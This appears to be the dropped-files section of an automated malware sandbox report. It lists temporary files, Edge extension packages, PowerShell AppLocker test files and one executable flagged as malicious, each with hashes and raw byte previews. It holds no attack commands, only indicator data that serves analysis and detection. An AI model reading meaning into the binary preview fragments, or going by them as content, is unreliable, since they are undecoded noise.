                                                                                                                                                                                                                                                                                          SSDEEP:192:mtAfwr137nxUJrSixE7A6oAkdLST7arHuKJbYcfw11kqptGhbuHq1dh6LGsWLr48:YZrnGxSimERAkRSnGHuKJbYn11kstGhT
                                                                                                                                                                                                                                                                                          MD5:0D0474539A350D4B97466E99C0E94558
                                                                                                                                                                                                                                                                                          SHA1:609B7DB79FE1707BB3E3A42081A34FE5A91D5B16
                                                                                                                                                                                                                                                                                          SHA-256:3F100E3BF1A3884C39F0E1EAD167B23C5CD8AAD9F7AD82A2D234372CC85D370C
                                                                                                                                                                                                                                                                                          SHA-512:5D6AED16304EE56A98A0EAAEBF8EFAD1EC932AB216ABDB880057872C03D3AE024A974AF31784E97B189DD2487245155B2D5C633D9847FB225A40C73A5080AB55
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:..@..$...y.\b.........y.[9..*..(&...";...)INR:i{.....5...e..M......w..S..&..[...p...b....?.T.....u..@....T.t....d?..g......zq..b.R.L.=.7....+n}a...L.....\.....E. .0..?...N0........>.......D.8.3.)..j..0e..x.9....S.S.........>J.6?s.g.S....ZR.0..s.... |U.....U.q.\...4/O.WS..G........0lQn..Err>T:.....$....O..r.}..,I.../]<.r..t...*Q.-......./........D'......T5.....fc..K...&L...?.t7....7#~.....?%+Q...'.}.nZCu......nX.Q....b...^e.....'......'.w..[p..:(q.?....9t8.NJ.N..w.V....@..Sy..TE..M...|.C..1....(m8L..}..,K..n. e..^.G...<=nK....X..c..E..NQ'........JI!.zB.*]...s.F#F^'G.l.....k...2IQ....g.....j..8:.aR....-&m"...U......5(W.\....?...s.T.k.pN*..`..@..m.o.'.4Vf...l,.tN..P.:'....W.v.M!.R..y...&_...._..V$.......kE9.u.36....l.3....|..'.o.m..Ip...S..........z.?.'.A..-HROz.......+..z.W.s..;....Zc^`4.^.,..Z.lJd..9%,.\...p.An.b..KT.|..On&.;..6R.V.F6".4.*.7!k.uY..`....s.^8....In..BA.`..[.F.F...........FQ..\.z..E$!..N6;c.j.A..u..X.....H.x.)..Sr...

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Zero

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):145408
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.432264190600097
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:vg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWf05mjn:o5vPeDkjGgQaE/loUDtf0an
                                                                                                                                                                                                                                                                                          MD5:F45A564977515AF44D3341B52C62ECAC
                                                                                                                                                                                                                                                                                          SHA1:321EE844C7CDA93C58164B1AA6E9797BE5182EF0
                                                                                                                                                                                                                                                                                          SHA-256:678996763570901D3ED13F16B0EC8B867E3F38B392E6E1A9E4470DBFBE26FBB1
                                                                                                                                                                                                                                                                                          SHA-512:4F2921C01AF3E0752526B37F76C3A79326E1FEBA96F4AD20CC755EC64DB3988987E902927AFECF352E85B7C23F6108FDAFE550EE7286830E4556FD9217768EFD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:t.Q......T)M..... ...`)M...T)M.;5d)M.u....|.....8.u.N...5d)M...X)M.^...v..D...8.t.]...I..X)M.j..4......T)M.YY..X)M..$....X)M....v..T)M...x)M....t)M...T...V..Np......NT....N$....N....h....V.C...YY..^...U..VW.}.........M...tF.E.S..t.;.....uH.^.....Q.........;...a...........h....V......E.YY..t.[j.j..7..X.I._^].....u.........M...t...6..V..j..N..V..F..4......F.YY.N.^.$...SVW..j._..l...............u.Nl.....N(...h....V.U...YY_..^[...U...u...(M......U...t...@)M.......y..u&...)M...u...M.........Qj..u...x.I.].....)M...U...u...(M..H.....@)M.......q.P.....j..u.j..u...x.I.]...U..M....t.W.}.........._]...V..4.I...(M.P..........t...@)M...j.....0.....^...U....SVW.}..E.P..7....I..E.l....E...p....E.PV..x.I..M.E.;.t...u.;.x...uw.s..5..I.......f#.j.f.E.X.s.....E...u.f......f#.j.X...f.M..E.;.|..........}..t...|...;.......;....}..t......._^[.....}....t.....x.....s.......U......(M.V.u.WV.......@)M.....8..........;u.........M...E......Q.u.j V..x.I._^....U......\SVW.u...(M..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2004
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.700164172528013
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:j1SU4y4RQmFoUeComfm9qr9tK8NrjPgH1k9tnMdPyILZI3:jMHyIFKL4O9qr2KvgH1uRMQIe3
                                                                                                                                                                                                                                                                                          MD5:21EB2712E3B72E3DFD5CE7A38D96989E
                                                                                                                                                                                                                                                                                          SHA1:994B56C7E4A704E818E1C2CFE10E1A43AE17CFE7
                                                                                                                                                                                                                                                                                          SHA-256:F88336BADD37E6A228FDC319205018CE0A4FA274508C0294739DAA86A27271D1
                                                                                                                                                                                                                                                                                          SHA-512:383326FB2209B513B507A29BB5F45D6E0992E70445BF473804A1BF8DAB72745C23CAE14AE9248C757E42DE5201EC1DB13C187CC232CB4A7EB8826BD0F2F5CDBD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:@...e................................................@..........@...............M6.]..O....PI.&'.......System.Web.Extensions...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\1658d6d8-b39a-4d7e-a4fd-0fd775ab9f18.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density -14497x-14496, segment length 16, comment: "Lavc59.36.100", baseline, precision 8, 1280x720, components 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):58019
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.6197203554676864
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:wibeJ78pJujohmmj4hHIcrPz/M7tWsLurwxdD:wB8KUhmmj4hHIcrPz/M7tHswH
                                                                                                                                                                                                                                                                                          MD5:ED8172BBAFD5AAF90E5C465FA619EF8B
                                                                                                                                                                                                                                                                                          SHA1:8C510C1F24FD3DAA2B99BB9E976DD93573EF6D3B
                                                                                                                                                                                                                                                                                          SHA-256:F4575D390066492F874B66049FFA68654EFD3151C14954554A71F93F5967A07E
                                                                                                                                                                                                                                                                                          SHA-512:C815D486A7CAC66133EF1618D3239A7586EED852571CF8C19862918BB1EAFA15059B0F1C465D72035A9F23A82255DF5A2CF725702A86BE1C2E09AC9D540C4B4A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:......JFIF....._.`......Lavc59.36.100....C.............................................................."")..............................................................................2q.1!R.....aSQ...Ar3......"BT.C.c.bs#4e....5.U.$........................!1.Q..2aqA..R...S."3....rBb...C.s#.$.c................................?...x..@......P.@............@.........@.............E.................P.....E.................................E.E.E.E.E.E.E.....................P.P.P.P......................................@...................P..............P.P..........P..............U..................@............@......@TP..............................................................P.P.P.P..............@.@......@.@.@.@..........................E.@.P.P............................QA....................PE@............P..........TPA............A.............P.........@P.........@.............@TPE..................P.P......................P.P.P......................................@...@......

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\3e27e1ff-a48b-47f3-a173-0604e79c4d07.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):11185
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                          MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                          SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                          SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                          SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\4a497cb5-bd05-4d5a-b360-02e87b94c134.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                          MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                          SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                          SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                          SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\RES27E7.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Tue Dec 31 17:25:35 2024, 1st section name ".debug$S"
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1332
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.984294439353044
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:HUKFzW916E2cbHewKqxmNII+ycuZhNbGakSKXPNnqS2d:PEjbdKqxmu1ulbGa3KFqSG
                                                                                                                                                                                                                                                                                          MD5:25145507D6138D381753445F1821A30D
                                                                                                                                                                                                                                                                                          SHA1:243862973F0D0AAF11CE6E65C0720E4C7BEFFEFE
                                                                                                                                                                                                                                                                                          SHA-256:74BD25DB8621F5272798E72DAD317C2E2B84A6505FD96A4FF4F017EE21250C3B
                                                                                                                                                                                                                                                                                          SHA-512:53F26AFBF9526A53AA0448F8AE25E50938B4AF2CF8F17A693A1C0E839BDE49BA0DFED1905157E5732B1B4693D99D10B11B7053494D3AFC5DAD7DF4E938EE1966
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:L....)tg.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........T....c:\Users\user\AppData\Local\Temp\l2xn2zg1\CSC17118CCF1564C5291822499255B405E.TMP................B..ATI*.\..LNpT..........5.......C:\Users\user\AppData\Local\Temp\RES27E7.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.2.x.n.2.z.g.1...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jwwwrwnj.3oq.psm1

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x53s2dy2.z1j.ps1

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\a3ff8415-1772-4dfe-8505-885dec19324d.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                          MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                          SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                          SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                          SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\bdaab3ed-0667-4986-9a5e-3b6b7e7f712e.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):31335
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.694019108205432
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:514ugFV0910SWyR5kNVdS3sNp/xm3MbiMuYEDlyFUyv6E/ty8:5WcDWyRKNVd2M/IxMuYEDlymsTQ8
                                                                                                                                                                                                                                                                                          MD5:6B72597205C77D3E40E1A35BEE403801
                                                                                                                                                                                                                                                                                          SHA1:6BECEE055C6E057AF9475B6D651B4EE561D02F20
                                                                                                                                                                                                                                                                                          SHA-256:C899297FBDFC88C1634B1145A087FDB5BE17172FD786C078B299557B22F06DEB
                                                                                                                                                                                                                                                                                          SHA-512:7CB1A98E0C7FBB349D9CB681233A9F4ED22A1C3FAADCDF1BC270B04BD97D3FC41AB6F762B2F5F231281D63D96AC3D243640BA81D5E8CCD9F54486B4F538CA8B4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2110
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.414439355384585
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:Yzj57SnaJ57H57Uv5W1Sj5W175zuR5z+5zn071eDJk5c1903bj5jJp0gcU854RrZ:8e2Fa116uCntc5toYunM
                                                                                                                                                                                                                                                                                          MD5:2CE35ABDE7B4EC405D1C96A9F38E55AC
                                                                                                                                                                                                                                                                                          SHA1:7060DFAFEA665886A25DD77D1E069FBBDFEAA28B
                                                                                                                                                                                                                                                                                          SHA-256:9CB46658482B02F0085C2852D0A7726C1AFF8C885ADB25ECBCB33613CA45B5EF
                                                                                                                                                                                                                                                                                          SHA-512:540457CA99050C290CAB60BE18AB3C3D8AE958E161ED9067622DC06F17A6934AFCF4EA1A164E09C262E58D24A05B51DED03BC8C4D63E7BA4190BC6DE77D37773
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"logTime": "1004/133448", "correlationVector":"vYS73lRT+EoO2Owh9jsc+Y","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"n/KhuHPhHmYXokB31+JZz7","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"fclQx26bUZO07waFEDe6Fn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"0757l0tkKt37vNrdCKAm8w","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"uTRRkmbbqkgK/wPBCS4fct","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"2DrXipL1ngF91RN7IemK0e","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"d0GyjEgnW85fvDIojHVIXI","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"PvfzGWRutB/kmuXUK+c8XA","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"29CB75FBC4C942E0817A1F7A0E2CF647

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\e5e198b4-9cd7-4fd2-9ee5-f0779f20bd5a.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):154477
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                          MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                          SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                          SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                          SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1171058
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.974719842517002
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24576:m3MC8rKTajLzXTnQiz0hiX7oPpR0vBaUx4zUqwvkJRguGNvVekg7dcc9qVp3V2:cTojzhYkwYJaUVq+k7VcZgBccAV94
                                                                                                                                                                                                                                                                                          MD5:39798D9BFF4607F95DF260FF89C564C0
                                                                                                                                                                                                                                                                                          SHA1:A768D0F6BF5CBF67E17079610CD1E00F5638C66C
                                                                                                                                                                                                                                                                                          SHA-256:2E2F4121AD5623B152F88DD73801CA49BF7E90473D9BF6A3994E9462F4C585A4
                                                                                                                                                                                                                                                                                          SHA-512:135F4AE34263224036BAC5552B12076F15FB8656FFCA30B0919E6652BD015281EC4C8D462586D00834FD108A9488B8F56444D9991F748CB8930F1F8ADCA3B767
                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 24%
                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L...X|.N.................n.......B...8............@..........................@......=.....@.................................4........@...................6......d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc........@......................@..@.reloc..2....0......................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\l2xn2zg1\CSC17118CCF1564C5291822499255B405E.TMP

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                                                                          File Type:MSVC .res
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):652
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.110380701245953
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryhGak7YnqqKXPN5Dlq5J:+RI+ycuZhNbGakSKXPNnqX
                                                                                                                                                                                                                                                                                          MD5:184212A54154492A8E5C81DE4C4E7054
                                                                                                                                                                                                                                                                                          SHA1:BAD208EA6C8D0C961DCA32417F12C45E997916B2
